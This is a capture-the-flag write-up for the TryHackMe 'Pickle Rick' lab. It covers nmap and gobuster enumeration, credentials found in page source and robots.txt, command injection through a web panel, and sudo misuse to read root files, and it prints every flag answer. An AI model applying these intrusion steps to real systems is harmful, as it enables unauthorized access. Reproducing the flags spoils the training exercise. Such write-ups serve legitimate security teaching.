TryHackMe room: https://tryhackme.com/room/picklerick

Stage 1: Enumeration

```
┌─[kn0ck3r@parrot]─[~/Documents/THM/Boxes/picklerick]
└──╼ $sudo nmap -sV -sC -A -Pn 10.10.52.5 -oA nmap/picklerick
[sudo] password for kn0ck3r: 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-14 11:55 BST
Nmap scan report for 10.10.52.5
Host is up (0.027s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 76:0b:a9:e5:91:7a:cb:a8:cd:24:49:27:28:e7:0a:62 (RSA)
|   256 16:3a:b6:8e:c7:b9:0a:94:f3:8f:4a:a2:e3:8e:81:88 (ECDSA)
|_  256 ba:7d:6c:3c:f1:f8:83:29:51:b1:bb:56:69:68:dd:d6 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=10/14%OT=22%CT=1%CU=43079%PV=Y%DS=2%DC=T%G=Y%TM=5F86D9
OS:3D%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=2%ISR=109%TI=Z%CI=I%II=I%TS=8)OP
OS:S(O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST
OS:11NW7%O6=M505ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)EC
OS:N(R=Y%DF=Y%T=40%W=6903%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 111/tcp)
HOP RTT      ADDRESS
1   28.45 ms 10.11.0.1
2   28.56 ms 10.10.52.5

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.94 seconds
```

From this we see that two ports open: 22 (SSH) & 80(HTTP)

From experience there isn't much vulnerable with SSH so we will attempt to exploit port 80 first and try to find some creds.

Going to the website gives a Rick and Morty themed homepage.

However, if I view source I find a username!

```
<!--

    Note to self, remember username!

    Username: R1ckRul3s

-->
```

From here I decided to enumerate the website using gobuster.

```
┌─[kn0ck3r@parrot]─[~/Documents/THM/Boxes/picklerick]
└──╼ $gobuster dir -u 10.10.52.5 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.52.5
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,html,txt
[+] Timeout:        10s
===============================================================
2020/10/14 12:00:47 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/assets (Status: 301)
/portal.php (Status: 302)
/index.html (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
===============================================================
2020/10/14 12:01:00 Finished
===============================================================
```

Checking /robots.txt I find a possible password.

```
Wubbalubbadubdub
```

```
─[kn0ck3r@parrot]─[~/Documents/THM/Boxes/picklerick]
└──╼ $cat creds.txt 
R1ckRul3s:Wubbalubbadubdub
```

Gobuster found the page /portal.php

Checking this I found it to be a login page.

Stage 2: Gaining Access

The creds we found worked and we are presented with a command panel.

Doing a simple 'ls' on this shows us the location of our first flag!

```
Sup3rS3cretPickl3Ingred.txt
```

Opening this in the browser gives out first ingredient!

```
mr. meeseek hair
```

We know this application is vulnerable to command injection, let’s see if we can perform a directory traversal to view other parts of the application. Going back to the directory  listing we notice there’s a clue.txt file. Opening the file we see the following:

```
Look around the file system for the other ingredient.
```

Using this I tried to find the users.

```
ls -al /home
```

```
total 16
drwxr-xr-x  4 root   root   4096 Feb 10  2019 .
drwxr-xr-x 23 root   root   4096 Oct 14 10:53 ..
drwxrwxrwx  2 root   root   4096 Feb 10  2019 rick
drwxr-xr-x  4 ubuntu ubuntu 4096 Feb 10  2019 ubuntu
```

This tells us that there is a rick user.

```
ls -al /home/rick
```

This shows that there is a file called "second ingredients"

```
total 12
drwxrwxrwx 2 root root 4096 Feb 10  2019 .
drwxr-xr-x 4 root root 4096 Feb 10  2019 ..
-rwxrwxrwx 1 root root   13 Feb 10  2019 second ingredients
```

We need to open this fiule with 'less' and we have found the second ingredient!

```
less /home/rick/'second ingredients'
```

Which outputs:

```
1 jerry tear
```

Stage 3: Privilege Escalation

We need to see if we can elevate to the root user now to access the final ingredient.

I will try the command:

```
sudo -l
```

This will tell us what we can run as the super user.

```
Matching Defaults entries for www-data on ip-10-10-52-5.eu-west-1.compute.internal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ip-10-10-52-5.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL
```

So this tells us that we can run any command as sudo with no password... that is some very bad security!

```
sudo -ls -al /root
```

The output from this gives us the following:

```
total 28
drwx------  4 root root 4096 Feb 10  2019 .
drwxr-xr-x 23 root root 4096 Oct 14 10:53 ..
-rw-r--r--  1 root root 3106 Oct 22  2015 .bashrc
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4096 Feb 10  2019 .ssh
-rw-r--r--  1 root root   29 Feb 10  2019 3rd.txt
drwxr-xr-x  3 root root 4096 Feb 10  2019 snap
```

Therefore the final ingredient can be gained with the following command:

```
sudo less /root/3rd.txt
```

Giving us the final flag:

```
3rd ingredients: fleeb juice
```
